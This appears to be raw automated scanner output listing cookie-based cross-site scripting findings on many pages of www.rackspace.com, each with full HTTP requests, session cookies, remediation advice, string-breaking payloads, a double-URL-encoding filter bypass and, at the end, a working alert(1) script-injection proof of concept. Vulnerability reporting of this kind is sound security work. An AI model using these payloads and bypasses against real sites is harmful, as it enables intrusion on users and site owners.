This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/fanatical_support/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8b5cb0%2527%253b984f54e5a1f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee345%2527%253b64377c2636a was submitted in the IS_UASrackuid cookie. This input was echoed as ee345';64377c2636a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/file_sharing/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ee345%2527%253b64377c2636a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed5c6%2527%253bfd19e84fece was submitted in the IS_UASrackuid cookie. This input was echoed as ed5c6';fd19e84fece in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/file_sharing/hosted_sharepoint/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ed5c6%2527%253bfd19e84fece; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a26b4%2527%253b0f268ccf58a was submitted in the IS_UASrackuid cookie. This input was echoed as a26b4';0f268ccf58a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/r_customers/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a26b4%2527%253b0f268ccf58a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 845b0%2527%253b22b77f3deeb was submitted in the IS_UASrackuid cookie. This input was echoed as 845b0';22b77f3deeb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/reseller_program HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8845b0%2527%253b22b77f3deeb; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30fc4%2527%253b939dc6e4314 was submitted in the IS_UASrackuid cookie. This input was echoed as 30fc4';939dc6e4314 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/reseller_program/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f830fc4%2527%253b939dc6e4314; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e5a7%2527%253b5acd2d719ad was submitted in the IS_UASrackuid cookie. This input was echoed as 2e5a7';5acd2d719ad in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/search/results/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f82e5a7%2527%253b5acd2d719ad; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13396%2527%253bba80f3d2c5f was submitted in the IS_UASrackuid cookie. This input was echoed as 13396';ba80f3d2c5f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/sitemap HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f813396%2527%253bba80f3d2c5f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb61%2527%253b55e54a5fd76 was submitted in the IS_UASrackuid cookie. This input was echoed as acb61';55e54a5fd76 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/submit_idea/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8acb61%2527%253b55e54a5fd76; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a8ce%2527%253b66f9e5851f6 was submitted in the IS_UASrackuid cookie. This input was echoed as 8a8ce';66f9e5851f6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/why_hosted_apps/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f88a8ce%2527%253b66f9e5851f6; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38b90</script><script>alert(1)</script>389e15e9f43 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
